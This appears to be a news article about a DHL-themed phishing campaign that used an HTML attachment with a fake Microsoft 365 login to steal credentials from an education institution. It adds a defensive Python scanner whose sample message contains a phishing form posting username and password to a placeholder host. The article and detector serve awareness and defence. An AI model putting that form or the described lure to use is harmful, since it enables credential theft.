According to experts, a new phishing campaign has been discovered that impersonates logistics giant DHL to steal Microsoft 365 credentials from victims in the education industry.
Cybersecurity researchers from Armorblox recently found a significant phishing campaign, with more than 10,000 emails sent to inboxes connected to a "private education institution".
The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.
False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.
A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If victims enter their login credentials, the credentials are sent directly to the attackers.
Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”
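Because the message described in the quote above carried no bad URLs or links, only an HTML attachment with a phishing form, URL reputation has nothing to match and the attachment itself has to be inspected. The following Python check is an added example (not from Armorblox or the original article) that flags HTML attachments containing a password field; the sample message, its addresses and the `collector.invalid` form target are constructed placeholders.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample message; sender and form target are placeholders.
SAMPLE_EML = """\
From: "DHL Express" <notify@example.org>
Subject: DHL Shipping Document/Invoice Receipt
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please provide the correct delivery address in the attached document.
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="Shipping Document Invoice Receipt.html"

<html><body><img src="preview.png" style="filter:blur(4px)">
<form method="post" action="https://collector.invalid/submit">
<input type="email" name="user"><input type="password" name="pass"></form></body></html>
--b1--
"""

class FormFinder(HTMLParser):
    """Collects the credential-form markers present in an HTML document."""
    def __init__(self):
        super().__init__()
        self.markers = set()

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.markers.add("form")
        elif tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.markers.add("password-input")

def scan_message(raw):
    """Return (filename, markers) for each HTML attachment with a password field."""
    findings = []
    for part in email.message_from_string(raw, policy=policy.default).walk():
        name = part.get_filename() or ""
        html_like = part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm"))
        if part.is_multipart() or not part.is_attachment() or not html_like:
            continue
        finder = FormFinder()  # decode as UTF-8 regardless of the declared charset
        finder.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        if "password-input" in finder.markers:
            findings.append((name, sorted(finder.markers)))
    return findings
```

A hit is a reason to quarantine or review the message, not proof of phishing, since legitimate HTML attachments with login forms are rare but do exist.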
Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.
According to the researchers, the attackers used a valid domain to avoid Microsoft's email authentication checks.